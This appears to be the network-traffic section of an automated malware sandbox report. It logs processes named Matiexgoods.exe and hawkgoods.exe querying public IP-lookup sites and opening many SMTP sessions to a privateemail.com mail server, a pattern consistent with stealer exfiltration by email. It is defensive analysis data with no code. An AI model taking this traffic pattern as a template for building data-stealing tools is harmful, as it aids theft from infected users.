                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  Content-Length: 103
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 37 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.74</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  11192.168.2.749789216.146.43.7080C:\Users\user\AppData\Local\Temp\Matiexgoods.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  Feb 2, 2021 08:53:48.376410007 CET5143OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Feb 2, 2021 08:53:48.450817108 CET5144INHTTP/1.1 200 OK
                                                                                                  Content-Type: text/html
                                                                                                  Server: DynDNS-CheckIP/1.0.1
                                                                                                  Connection: close
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  Content-Length: 103
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 37 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.74</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  2192.168.2.749732131.186.113.7080C:\Users\user\AppData\Local\Temp\Matiexgoods.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  Feb 2, 2021 08:52:05.217569113 CET1040OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Feb 2, 2021 08:52:05.276901960 CET1040INHTTP/1.1 200 OK
                                                                                                  Content-Type: text/html
                                                                                                  Server: DynDNS-CheckIP/1.0.1
                                                                                                  Connection: close
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  Content-Length: 103
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 37 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.74</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  3192.168.2.749734131.186.113.7080C:\Users\user\AppData\Local\Temp\Matiexgoods.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  Feb 2, 2021 08:52:13.783994913 CET1046OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Feb 2, 2021 08:52:13.845175028 CET1046INHTTP/1.1 200 OK
                                                                                                  Content-Type: text/html
                                                                                                  Server: DynDNS-CheckIP/1.0.1
                                                                                                  Connection: close
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  Content-Length: 103
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 37 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.74</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  4192.168.2.749735131.186.113.7080C:\Users\user\AppData\Local\Temp\Matiexgoods.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  Feb 2, 2021 08:52:14.162292004 CET1049OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Feb 2, 2021 08:52:14.221944094 CET1049INHTTP/1.1 200 OK
                                                                                                  Content-Type: text/html
                                                                                                  Server: DynDNS-CheckIP/1.2.0
                                                                                                  Connection: close
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  Content-Length: 103
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 37 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.74</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  5192.168.2.749736131.186.113.7080C:\Users\user\AppData\Local\Temp\Matiexgoods.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  Feb 2, 2021 08:52:14.511794090 CET1051OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Feb 2, 2021 08:52:14.571176052 CET1051INHTTP/1.1 200 OK
                                                                                                  Content-Type: text/html
                                                                                                  Server: DynDNS-CheckIP/1.0.1
                                                                                                  Connection: close
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  Content-Length: 103
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 37 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.74</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  6192.168.2.749769104.16.155.3680C:\Users\user\AppData\Local\Temp\hawkgoods.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  Feb 2, 2021 08:53:01.163186073 CET2529OUTGET / HTTP/1.1
                                                                                                  Host: whatismyipaddress.com
                                                                                                  Connection: Keep-Alive
                                                                                                  Feb 2, 2021 08:53:01.225852966 CET2530INHTTP/1.1 403 Forbidden
                                                                                                  Date: Tue, 02 Feb 2021 07:53:01 GMT
                                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                                  Content-Length: 16
                                                                                                  Connection: keep-alive
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                  Set-Cookie: __cfduid=d8412a81e43270e1884d4cbba2a07a91d1612252381; expires=Thu, 04-Mar-21 07:53:01 GMT; path=/; domain=.whatismyipaddress.com; HttpOnly; SameSite=Lax; Secure
                                                                                                  cf-request-id: 080354181000001f3177225000000001
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 61b256067e711f31-FRA
                                                                                                  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                  Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30
                                                                                                  Data Ascii: error code: 1020


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  7192.168.2.749777216.146.43.7080C:\Users\user\AppData\Local\Temp\Matiexgoods.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  Feb 2, 2021 08:53:26.770868063 CET3778OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Connection: Keep-Alive
                                                                                                  Feb 2, 2021 08:53:26.845346928 CET3778INHTTP/1.1 200 OK
                                                                                                  Content-Type: text/html
                                                                                                  Server: DynDNS-CheckIP/1.0.1
                                                                                                  Connection: close
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  Content-Length: 103
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 37 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.74</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  8192.168.2.749779216.146.43.7080C:\Users\user\AppData\Local\Temp\Matiexgoods.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  Feb 2, 2021 08:53:28.295042992 CET3780OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Feb 2, 2021 08:53:28.368408918 CET3781INHTTP/1.1 200 OK
                                                                                                  Content-Type: text/html
                                                                                                  Server: DynDNS-CheckIP/1.0.1
                                                                                                  Connection: close
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  Content-Length: 103
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 37 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.74</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  9192.168.2.749787216.146.43.7080C:\Users\user\AppData\Local\Temp\Matiexgoods.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  Feb 2, 2021 08:53:46.745872021 CET5135OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Feb 2, 2021 08:53:46.820859909 CET5136INHTTP/1.1 200 OK
                                                                                                  Content-Type: text/html
                                                                                                  Server: DynDNS-CheckIP/1.0.1
                                                                                                  Connection: close
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  Content-Length: 103
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 37 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.74</body></html>


                                                                                                  HTTPS Packets

                                                                                                  TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                  Feb 2, 2021 08:52:13.208453894 CET104.21.19.200443192.168.2.749733CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Aug 10 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Tue Aug 10 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                                                                                                  CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                  Feb 2, 2021 08:53:45.447184086 CET104.21.19.200443192.168.2.749785CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Aug 10 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Tue Aug 10 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                                                                                                  CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

                                                                                                  SMTP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                  Feb 2, 2021 08:52:22.813158989 CET58749740199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:22.813167095 CET58749741199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:22.813688993 CET49740587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:23.004148006 CET58749740199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:23.785701990 CET58749742199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:23.786706924 CET49742587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:23.980775118 CET58749742199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:25.029432058 CET58749743199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:25.030982018 CET49743587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:25.224092007 CET58749743199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:26.059046984 CET58749744199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:26.059510946 CET49744587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:26.250122070 CET58749744199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:26.251414061 CET49744587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:52:26.441719055 CET58749744199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:52:27.599121094 CET58749745199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:27.599586964 CET49745587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:27.791764021 CET58749745199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:28.954073906 CET58749746199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:28.984247923 CET49746587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:29.188302040 CET58749746199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:29.188587904 CET49746587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:52:29.390053034 CET58749746199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:52:30.722702980 CET58749747199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:30.723046064 CET49747587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:30.913746119 CET58749747199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:30.914057970 CET49747587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:52:31.104008913 CET58749747199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:52:32.490869999 CET58749748199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:32.491282940 CET49748587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:32.681601048 CET58749748199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:32.682013988 CET49748587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:52:32.872016907 CET58749748199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:52:34.427877903 CET58749750199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:34.428292990 CET49750587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:34.618705034 CET58749750199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:34.620052099 CET49750587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:52:34.809961081 CET58749750199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:52:36.613873005 CET58749751199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:36.614547968 CET49751587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:36.804939985 CET58749751199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:36.805289984 CET49751587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:52:36.996551037 CET58749751199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:52:37.736371040 CET58749752199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:37.737236977 CET49752587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:37.928690910 CET58749752199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:37.929166079 CET49752587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:52:38.122827053 CET58749752199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:52:38.495201111 CET58749753199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:38.495958090 CET49753587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:38.698676109 CET58749753199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:38.705585957 CET49753587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:52:38.909257889 CET58749753199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:52:40.640491962 CET58749754199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:40.640836954 CET49754587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:40.742924929 CET58749755199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:40.743376017 CET49755587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:40.832242012 CET58749754199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:40.833101988 CET49754587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:52:40.936414957 CET58749755199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:41.023488045 CET58749754199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:52:41.073451996 CET58749756199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:41.073873043 CET49756587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:41.264448881 CET58749756199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:41.264954090 CET49756587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:52:41.454988003 CET58749756199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:52:42.805581093 CET58749757199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:42.808633089 CET49757587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:43.001002073 CET58749757199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:43.001396894 CET49757587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:52:43.191638947 CET58749757199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:52:43.927926064 CET58749758199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:43.928359985 CET49758587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:44.119829893 CET58749758199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:44.120193958 CET49758587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:52:44.310609102 CET58749758199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:52:45.416155100 CET58749759199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:45.416457891 CET49759587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:45.606834888 CET58749759199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:45.607120991 CET49759587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:52:45.799350977 CET58749759199.193.7.228192.168.2.7220 Ready to start TLS
